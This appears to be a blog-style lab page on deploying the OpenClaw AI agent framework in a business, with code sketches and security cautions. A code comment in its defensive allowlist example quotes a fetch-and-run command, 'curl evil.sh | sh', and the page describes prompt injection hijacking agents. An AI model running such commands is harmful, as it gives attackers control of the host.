Lab · Agentic AI · Active Exploration
Agentic AI in Business
A living exploration of autonomous agents, personal AI, and what actually works — from someone who’s deploying them in a real business.
I’m exploring agentic AI frameworks hands-on — not as demos, but as actual deployments against real problems. This Lab section documents what I find: what works, what breaks, what the hype gets wrong, and what the security risks actually look like.
Read the first blog post →
Entry 01 · April 2026
OpenClaw — The Personal AI Agent
An open-source AI agent framework that runs locally on your machine, connects to LLMs, and executes tasks through WhatsApp, Telegram, Slack, or Discord.
Read the full blog post: I Gave an AI Agent the Keys to My Business →
What It Is
OpenClaw is an open-source AI agent framework created by Peter Steinberger, originally launched as Clawdbot in late 2025. It connects large language models to your tools — file system, browser, messaging apps, APIs — and executes real tasks autonomously. You interact with it through WhatsApp or Telegram like texting a colleague. It has 100+ built-in skills and a community registry (ClawHub) with hundreds more.
Core Architecture
Local Node.js service — gateway and message router; runs on your machine
LLM reasoning layer — Claude, GPT, DeepSeek, or local models via your own API keys
100+ built-in skills — plus ClawHub community registry with hundreds more
20+ messaging channels — WhatsApp, Telegram, Slack, Discord as the interaction interface
Scheduled execution — cron jobs ("heartbeats") for autonomous task execution; see the sketch after this list
Privacy-first — data stays local by default; no third-party ingestion
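To make the heartbeat idea concrete, here is a minimal sketch of scheduled execution in Node.js. I'm using node-cron as the scheduler; runAgentTask and the example schedule are placeholders I invented, not OpenClaw's actual API.

```typescript
// A minimal heartbeat sketch using node-cron (npm i node-cron).
// runAgentTask is a placeholder, not OpenClaw's real API.
import cron from "node-cron";

async function runAgentTask(prompt: string): Promise<void> {
  // In a real deployment this would hand the prompt to the LLM
  // reasoning layer and dispatch any resulting tool calls.
  console.log(`[heartbeat] executing: ${prompt}`);
}

// Fire every morning at 07:00 and log failures loudly, because
// scheduled runs can silently fail (see the reliability note below).
cron.schedule("0 7 * * *", async () => {
  try {
    await runAgentTask("Summarize overnight support tickets");
  } catch (err) {
    console.error("[heartbeat] failed, needs human attention:", err);
  }
});
```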
What Works in Practice
Structured, well-defined tasks — research, content drafting, script execution, code deployment
Low-friction interface — existing messaging apps mean no new UI to learn
Local-first architecture — sensitive data stays off third-party servers
Extensible skill system — custom capability building for domain-specific workflows
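To give a feel for the skill system, here is a hypothetical domain-specific skill. The Skill interface below is my own invention for illustration; check the actual OpenClaw skill contract before building against it.

```typescript
// Hypothetical skill shape, invented for illustration.
interface Skill {
  name: string;
  description: string; // what the LLM sees when choosing a tool
  run(args: Record<string, string>): Promise<string>;
}

// A domain-specific skill: look up an order in your own system.
// fetchOrder endpoint and response shape are placeholders.
const orderLookup: Skill = {
  name: "order_lookup",
  description: "Fetch the status of a customer order by order ID.",
  async run(args) {
    const res = await fetch(`https://example.internal/orders/${args.id}`);
    if (!res.ok) return `No order found for id ${args.id}`;
    const order = await res.json();
    return `Order ${args.id}: ${order.status}`;
  },
};
```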
What Doesn’t — Yet
Reliability — scheduled tasks don't always fire as expected and need active monitoring
Memory — context degrades across sessions; requires user-built memory architecture to compensate
Self-learning — autonomous improvement and proactive idea generation not observed in practice
Agent scaling — no built-in mechanism for spawning or delegating to sub-agents when complexity grows
Security Considerations
This is not optional reading. OpenClaw operates at the system level with significant permissions. The security risks are real, documented, and have affected real deployments — including mine.
Shell and file access — agents can execute shell commands, access file systems, and make network requests (a minimal guardrail sketch follows this list)
Exposed instances — misconfigured OpenClaw instances have been found exposed to the internet (42,000+ documented)
Third-party skill risk — the ClawHub registry lacks comprehensive vetting; malicious skills have been documented
Prompt injection — embedded instructions in documents or messages can hijack agent behavior
Unintended actions — agents may create, modify, or expose resources beyond the scope of their instructions (this happened to me — see the blog post)
Enterprise responses — NVIDIA released NemoClaw (March 2026) with sandboxing and container isolation; Cisco released DefenseClaw, which scans skills and generated code before execution
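One mitigation pattern worth sketching: never hand the agent raw shell access, gate every command through an allowlist. This is a generic defense-in-depth sketch, not OpenClaw's sandboxing; guardedShell and the allowlist contents are mine.

```typescript
// Gate every agent-requested command through an allowlist.
import { execFile } from "node:child_process";
import { promisify } from "node:util";

const exec = promisify(execFile);

// Only these binaries may run, regardless of what the model asks for.
const ALLOWED = new Set(["ls", "git", "grep"]);

export async function guardedShell(
  cmd: string,
  args: string[]
): Promise<string> {
  if (!ALLOWED.has(cmd)) {
    // A prompt-injected "curl evil.sh | sh" dies here instead of running.
    throw new Error(`blocked: '${cmd}' is not on the allowlist`);
  }
  // execFile does not spawn a shell, so pipes and redirects in args are inert.
  const { stdout } = await exec(cmd, args, { timeout: 10_000 });
  return stdout;
}
```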
When to Use an Agent
Use an agent when all three of the conditions below are met. Skip it when any of them fails. (A tiny predicate encoding this rubric follows the lists.)
Use when:
✓ The task is structured and repeatable
✓ The cost of failure is low or recoverable
✓ You can verify the output before it becomes permanent
Skip when:
✗ The task involves sensitive credentials or intellectual property without sandboxing
✗ You can't verify output before it takes effect (public code pushes, live emails, API calls)
✗ The task requires judgment or context the agent doesn't have
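For what it's worth, the rubric is simple enough to encode as a predicate. The field names below are mine; the point is that all three checks must pass before a task gets delegated.

```typescript
// The rubric above as a predicate: trivially simple on purpose,
// useful as a checklist you actually run before wiring up a task.
interface TaskProfile {
  structuredAndRepeatable: boolean;
  failureRecoverable: boolean;    // low cost of failure, or reversible
  outputVerifiableFirst: boolean; // you review before it takes effect
}

export function agentAppropriate(t: TaskProfile): boolean {
  return (
    t.structuredAndRepeatable &&
    t.failureRecoverable &&
    t.outputVerifiableFirst
  );
}
```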
Operational Principles
These are the principles I’m operating with after real-world use. Not theory — practice.
Security first — Evaluate every integration for attack surface. Assume every layer can be compromised.
Structure over natural language — Agents perform better with disciplined instructions than with conversational prompts.
Verify before trust — Until reliability improves, treat agent output as draft, not final.
Scope tightly — One agent, one domain. Overloading agents with diverse tasks degrades performance.
Build memory deliberately — Separate brand memory, project memory, and agent memory. Don't rely on built-in persistence.
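As a concrete version of that last principle, here is a minimal sketch of deliberate memory separation: three append-only stores, with only the scopes a task needs injected into the prompt. The file layout and function names are my own, not anything OpenClaw ships.

```typescript
// Sketch of "build memory deliberately": three separate stores
// instead of one opaque built-in history.
import { readFile, writeFile, mkdir } from "node:fs/promises";
import { join } from "node:path";

type MemoryScope = "brand" | "project" | "agent";

const MEMORY_ROOT = "./memory";

export async function remember(
  scope: MemoryScope,
  note: string
): Promise<void> {
  await mkdir(MEMORY_ROOT, { recursive: true });
  const file = join(MEMORY_ROOT, `${scope}.md`);
  const prior = await readFile(file, "utf8").catch(() => "");
  // Append-only markdown keeps each scope auditable and easy to prune.
  await writeFile(file, `${prior}- ${new Date().toISOString()} ${note}\n`);
}

// Inject only the scopes a task needs into the prompt, nothing more.
export async function recall(scopes: MemoryScope[]): Promise<string> {
  const parts = await Promise.all(
    scopes.map((s) =>
      readFile(join(MEMORY_ROOT, `${s}.md`), "utf8").catch(() => "")
    )
  );
  return parts.filter(Boolean).join("\n");
}
```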
Coming Next in This Series
Entry 02: Hermes Agent
Self-improving AI and the learning loop — a different model of agent intelligence.
Entry 03: Paperclip AI
Scaling autonomous agent teams — the orchestration problem.
Entry 04: Security Architecture
Designing multi-agent deployments with security as a first-class concern.
This series is updated as I go. Follow the work at the blog or reach out directly.
Exploring agentic AI in your organization?
I help founders and organizations think through AI deployment — security, architecture, and what’s actually worth building. Let’s talk.
Start a Conversation